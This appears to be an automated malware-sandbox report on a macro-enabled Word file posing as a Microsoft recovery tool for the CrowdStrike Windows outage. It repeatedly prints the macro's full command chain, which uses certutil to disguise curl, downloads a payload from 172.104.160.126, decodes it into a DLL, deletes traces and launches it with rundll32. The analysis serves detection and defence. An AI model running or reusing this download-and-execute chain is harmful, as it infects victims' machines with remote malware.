Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c "
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell")
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "

Downloads suspicious files via Chrome

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)

Jump to dropped file

Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6529.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6690.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer7050.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer601A.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer60A7.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6873.tmp	Jump to behavior

Source: C:\Windows\System32\certutil.exe

File deleted: C:\Windows\cer6529.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490F28
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F499B60
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4B1B00
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F497BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4BCBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490658
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F481AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4AE4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F48A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A49D0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4AADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49B840
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F484860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49F458
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4C0804
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4944A4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A88D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490C74
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4B2C88
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A7888
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F331B00
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F319B60
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310F28
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F33CBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F317BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310658
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F301AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F32E4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F32ADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3249D0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F30A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F340804
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31F458
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F304860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31B840
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F332C88
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F327888
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310C74
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3288D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3144A4

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: Sub Document_Open()

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA macros: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, VBA macros: true

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Stream path 'VBA/__SRP_0' : http://172.104.160.126:8099\curl.txt\curl.exe/payload2.txt\mscorsvc.txt\mscorsvc.dllC:\Windows\Sys"tem32\cmd.exe /c$-encode$\cu-decode"$ -o$del&rl.exe &.bq.aSTART( rundll32&,DllMainexit

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F48A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F495658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F321F00 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F321FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F4A1FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F314FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F315658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F30A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F494FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F4A1F00 appears 134 times

Source: classification engine

Classification label: mal88.expl.evad.winDOCM@51/26@4/3

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F483434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRAC07.tmp

Jump to behavior

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, Word Document stream: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.16.dr	OLE indicator, Word Document stream: true

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~WRC0001.tmp.16.dr	OLE document summary: title field not present or empty

Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ..............t........8Mw....f.......................v........v#.............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ......@.......(x#.....q8Mw............................~........w#.............
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d......................*.......q(2w............
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....................H.......<...............#........d..............................................
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d......................,.......................
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............................................#........d..............................................
Source: C:\Windows\System32\certutil.exe	Console Write: ..!.............................p.......(.P.............................................#........3)...............!.....b.......................
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............................................#........3)...............................!.............
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dA............... .....*.......q(2w...... .....
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................D...............#.......(dA............... ....................... .....
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dA............... .....,................. .....
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................\...............#.......(dA............... ....................... .....
Source: C:\Windows\System32\certutil.exe	Console Write: ..!............................... .....(.P.............................`...............#........3)...............!.....b.........2....... .....
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................d...............#........3).............(. ...............!....... .....
Source: C:\Windows\System32\certutil.exe	Console Write: ..!..............Q.w....................(.P.....................D.......................#.......(d................!.............q(2w............
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....................D.......................#.......(d..............H.................!.............
Source: C:\Windows\System32\certutil.exe	Console Write: ..!.............x.6.....................(.P.....................D.......................#.........6...............!.....n... .r.e.t.u.r.........
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.6.....................(.P.....................D.......................#.........6.............h........... .r...!.............
Source: C:\Windows\System32\certutil.exe	Console Write: ..!..............Q.w....................(.P.............................................#.......p.$...............!.....j.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ......P.(......^I.......uw......E.......(.............v........]I.............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ........(......`I.......uw......E..... .(.............~........^I.............
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d..............H.(.....*.......q(2w......(.....
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(.......................7{..............#........d..............H.(.......................(.....
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d..............H.(.....,.................(.....
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(........................{..............#........d..............H.(.......................(.....
Source: C:\Windows\System32\certutil.exe	Console Write: ................................ .(.....(.P.....(........................{..............#........3).....................b.........x.......(.....
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(........................{..............#........3)...............(.......................(.....
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dF.....................*.......q(2w............
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(........................\|..............#.......(dF.............................................
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dF.....................,.......................
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(.......................'\|..............#.......(dF.............................................
Source: C:\Windows\System32\certutil.exe	Console Write: ................................p.......(.P.....(.......................+\|..............#........3).....................b.........7.............
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(......................./\|..............#........3).............................................
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w............ .......(.P.....(.......................v~..............#.......(d..............................q(2w............
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....(.......................z~..............#.......(d..............................................
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.#.............@.......(.P.....(.......................~~..............#.........#.....................n... .r.e.t.u.r.........
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.#.....................(.P.....(........................~..............#.........#......................... .r.................
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....(........................~..............#.......p.$.....................j.......................

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\xcopy.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll
